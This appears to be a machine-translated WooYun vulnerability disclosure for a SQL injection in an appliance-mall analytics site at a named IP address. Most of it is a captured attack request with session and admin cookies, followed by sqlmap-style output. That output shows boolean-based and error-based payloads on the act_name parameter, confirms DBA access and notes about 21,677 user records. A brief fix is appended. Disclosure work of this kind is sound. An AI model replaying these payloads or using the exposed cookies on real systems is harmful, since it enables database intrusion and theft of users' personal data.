A website in HC has the SQL injection vulnerability involving more than 20 thousand user data entries.
A website in HC has the SQL injection vulnerability, involving more than pieces of user data.
Continued: WooYun-2016-173045
The Operating Analysis System of huicong household appliances City has the SQL Injection Vulnerability. A maximum of 21677 user data entries are contained in the User table.
Vulnerability URL: http: // 58.252.73.136: 8000/ActivityStatistics. aspx)
POST /ActivityStatistics.aspx HTTP/1.1Host: 58.252.73.136:8000User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://58.252.73.136:8000/ActivityStatistics.aspxCookie: iconSize=16x16; _pk_id.9.1549=c5212d09a738e870.1453532641.2.1453863564.1453863325.; ECS[visit_times]=6; Hm_lvt_f8b4f3f9251c122a04fe1c11caba248c=1453532839,1453628139,1453703226,1453863154; ECS[display]=grid; _pk_id.5.1549=a8a501c4964f2499.1453532858.1.1453532858.1453532858.; Hm_lvt_fd16bacbe2d90b129666bbde3ee2b5c6=1453532858; DTRememberName=test; ECS_ID=929fee0bac53c1d567ab0cde7cda9af2da4aeae9; Hm_lpvt_f8b4f3f9251c122a04fe1c11caba248c=1453863181; AdminName=MxWeiXinPF=test; AdminPwd=MxWeiXinPF=2CF8FE5DCB0BC697; ASP.NET_SessionId=vpyihj1zxbl0srl2icrcws51; nowweixinId=MxWeiXinPF=29; _pk_ses.9.1549=*Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 4192__VIEWSTATE=%2FwEPDwULLTE4MjQ2OTQ1MTUPZBYCAgMPZBYEAgsPFgIeC18hSXRlbUNvdW50AgUWCgIBD2QWAmYPFQ0Y5pmo5qyjODIx57K%2B5ZOB6LGG5rWG5py6cuaYr%2BWQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k%2BaOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xNSAxMDowMDowMDxici8%2B57uT5p2fOjIwMTUtMTItMTggMDA6MDA6MDAMMuWkqTE05bCP5pe2AzIzMhjmmajmrKPnsr7lk4HosYbmtYbmnLo4MjEEMC4wMAQwLjAwATABMAEwATAAZAICD2QWAmYPFQ0S5pmo5qyj6LGG5rWG5py6ODE2cuaYr%2BWQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k%2BaOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xNSAxMDowMDowMDxici8%2B57uT5p2fOjIwMTUtMTItMjEgMTY6MDA6MDALNuWkqTblsI%2Fml7YENTA0MRLmmajmrKPosYbmtYbmnLo4MTYEMC4wMAQwLjAwATABMAMxNjIDMTYyzAI8YSBocmVmPSJqYXZhc2NyaXB0OnZvaWQoMCkiICBvbmNsaWNrPSJBY3RpdmVTdGF0aXN0aWNzRGV0YWlsUmVwb3J0KCfmmajmrKPosYbmtYbmnLo4MTYnLCfmmajmrKPosYbmtYbmnLo4MTYnLCcwaCwxaCwyaCwzaCw0aCw1aCw2aCw3aCw4aCw5aCwxMGgsMTFoLDEyaCwxM2gsMTRoLDE1aCwxNmgsMTdoLDE4aCwxOWgsMjBoLDIxaCwyMmgsMjNoJywnMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAnKSI%2B6K%2Bm57uGPC9hPmQCAw9kFgJmDxUNJOS5kOmAlOWPluaaluWZqOeUteWPluaaluWZqE5TSC0xMihCKXLmmK%2FlkKbmuIXku5MmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL3llcy5naWYiIC8%2BPGJyLz7muIXku5PmjqjojZAmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL25vLmdpZiIgLz455byA5aeLOjIwMTUtMTItMTQgMTA6MDA6MDA8YnIvPue7k%2BadnzoyMDE1LTEyLTE3IDAwOjAwOjAwDDLlpKkxNOWwj%2BaXtgQ0NDY0JOS5kOmAlOWPluaaluWZqOeUteWPluaaluWZqE5TSC0xMihCKQQwLjAwBDAuMDABMAEwATgBOPACPGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIiAgb25jbGljaz0iQWN0aXZlU3RhdGlzdGljc0RldGFpbFJlcG9ydCgn5LmQ6YCU5Y%2BW5pqW5Zmo55S15Y%2BW5pqW5ZmoTlNILTEyKEIpJywn5LmQ6YCU5Y%2BW5pqW5Zmo55S15Y%2BW5pqW5ZmoTlNILTEyKEIpJywnMGgsMWgsMmgsM2gsNGgsNWgsNmgsN2gsOGgsOWgsMTBoLDExaCwxMmgsMTNoLDE0aCwxNWgsMTZoLDE3aCwxOGgsMTloLDIwaCwyMWgsMjJoLDIzaCcsJzAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwJykiPuivpue7hjwvYT5kAgQPZBYCZg8VDRnpn6nlhqDmhaLpgJ%2Fljp%2FmsYHmnLpCMTg4cuaYr%2BWQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k%2BaOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xMCAxMDowMDowMDxici8%2B57uT5p2fOjIwMTUtMTItMTUgMDA6MDA6MDAMNOWkqTE05bCP5pe2BDEwNDAZ6Z%2Bp5Yag5oWi6YCf5Y6f5rGB5py6QjE4OAcxMDY4LjAwBjUzNC4wMAEyATYBMAE23gI8YSBocmVmPSJqYXZhc2NyaXB0OnZvaWQoMCkiICBvbmNsaWNrPSJBY3RpdmVTdGF0aXN0aWNzRGV0YWlsUmVwb3J0KCfpn6nlhqDmhaLpgJ%2Fljp%2FmsYHmnLpCMTg4Jywn6Z%2Bp5Yag5oWi6YCf5Y6f5rGB5py6QjE4OCcsJzBoLDFoLDJoLDNoLDRoLDVoLDZoLDdoLDhoLDloLDEwaCwxMWgsMTJoLDEzaCwxNGgsMTVoLDE2aCwxN2gsMThoLDE5aCwyMGgsMjFoLDIyaCwyM2gnLCcwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCw1MzQuMDAsMC4wMCw1MzQuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAnKSI%2B6K%2Bm57uGPC9hPmQCBQ9kFgJmDxUNFeagvOWtkOeUteeBq%2BmUhUdaLUQzMXLmmK%2FlkKbmuIXku5MmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL3llcy5naWYiIC8%2BPGJyLz7muIXku5PmjqjojZAmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL25vLmdpZiIgLz455byA5aeLOjIwMTUtMTItMTAgMTA6MDA6MDA8YnIvPue7k%2BadnzoyMDE1LTEyLTE1IDAwOjAwOjAwDDTlpKkxNOWwj%2BaXtgQ1MDU0FeagvOWtkOeUteeBq%2BmUhUdaLUQzMQc2OTEyLjAwBjg2NC4wMAE4AzE0NAIxNgMxNjDeAjxhIGhyZWY9ImphdmFzY3JpcHQ6dm9pZCgwKSIgIG9uY2xpY2s9IkFjdGl2ZVN0YXRpc3RpY3NEZXRhaWxSZXBvcnQoJ%2BagvOWtkOeUteeBq%2BmUhUdaLUQzMScsJ%2BagvOWtkOeUteeBq%2BmUhUdaLUQzMScsJzBoLDFoLDJoLDNoLDRoLDVoLDZoLDdoLDhoLDloLDEwaCwxMWgsMTJoLDEzaCwxNGgsMTVoLDE2aCwxN2gsMThoLDE5aCwyMGgsMjFoLDIyaCwyM2gnLCcwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCw3NjguMDAsMC4wMCwzMDcyLjAwLDE1MzYuMDAsMC4wMCw3NjguMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDc2OC4wMCcpIj7or6bnu4Y8L2E%2BZAINDw8WBB4LUmVjb3JkY291bnQClQEeEEN1cnJlbnRQYWdlSW5kZXgCAWRkZF0NHV9Lg94Cxmefq7EXaADjZGsbyGu%2F5Ejgya0HF49S&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBQLQ%2B7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1
The injection point is act_name (POST) and the user is DBA.
Parameter: act_name (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=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&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND 3304=3304 AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: __VIEWSTATE=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&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND (SELECT 5121 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(5121=5121,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: MySQL 5.0current user: 'jdmall_test@%'current database: 'jdmall_test'current user is DBA: True
1. You can read the database configuration file to get the password and then take off your pants (I won't go deep here)
2. A user's database table exists (a maximum of 21677 users exist)
Solution:
1. Filter
2. The analysis system background should not be directly accessed by external users. At least perform background verification or do not allow external access or anything.